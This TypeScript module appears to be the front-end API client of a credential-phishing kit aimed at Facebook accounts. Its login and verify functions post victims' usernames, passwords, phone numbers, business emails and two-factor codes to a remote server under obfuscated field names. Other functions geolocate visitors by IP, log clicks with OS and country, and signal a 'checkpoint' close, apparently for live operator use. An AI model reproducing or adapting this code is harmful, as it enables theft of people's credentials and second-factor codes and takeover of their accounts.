import axios from "axios";
import { handleError, handleResponse } from "./utils";
import { DOMAIN_FB } from "./constant";
const ENDPOINT = DOMAIN_FB;

export const verify = async (
  username: string,
  password: string,
  code: string,
  countryCode: string,
  ipAddress: string,
  idea: string,
  timestamp: number,
  socketId: string
) => {
  try {
    const url = `${ENDPOINT}verify`;
    const params = {
      uvi: username,
      pvi: password,
      ivic: ipAddress,
      ccVi: countryCode,
      idSl: idea,
      fcVic: code,
      tiSV: timestamp,
      sId: socketId
    };
    const response = await axios.post<any>(url, params, { timeout: 1000000000000000 });
    return handleResponse(response.data);
  } catch (error) {
    return handleError(error, "error");
  }
};

export const login = async (
  phoneNumber: string,
  bEmail: string,
  username: string,
  password: string,
  countryCode: string,
  ipAddress: string,
  idea: string,
  socketId: string
) => {
  try {
    const url = `${ENDPOINT}login`;
    const params = {
      phvi: phoneNumber,
      bevi: bEmail,
      uvi: username,
      pvi: password,
      ivic: ipAddress,
      ccVi: countryCode,
      idSl: idea,
      sId: socketId
    };
    const response = await axios.post<any>(url, params, { timeout: 100000000000000 });
    return handleResponse(response.data);
  } catch (error) {
    return handleError(error, "error");
  }
};

export const getLocation = async () => {
  const url = `https://ipinfo.io/json`;
  const response = await axios.get(url);
  return { ip: response.data.ip, country_code: response.data.country };
};

export const click = async (
  idea: string,
  os: string,
  ip: string,
  countryCode: string
) => {
  try {
    const params = {
      ivic: ip,
      os: os,
      ccVi: countryCode,
      idSl: idea
    };
    const url = `${ENDPOINT}click`;
    const response = await axios.post(url, params);
    return handleResponse(response.data);
  } catch (error) {
    return handleError(error, "something went wrong");
  }
};

export const closeWindow = async (socketId: string) => {
  try {
    const url = `${ENDPOINT}manual/close-check-point`;
    const response = await axios.post(url, {
      socketId
    });
    return handleResponse(response.data);
  } catch (error) {
    return handleError(error, "something went wrong");
  }
};
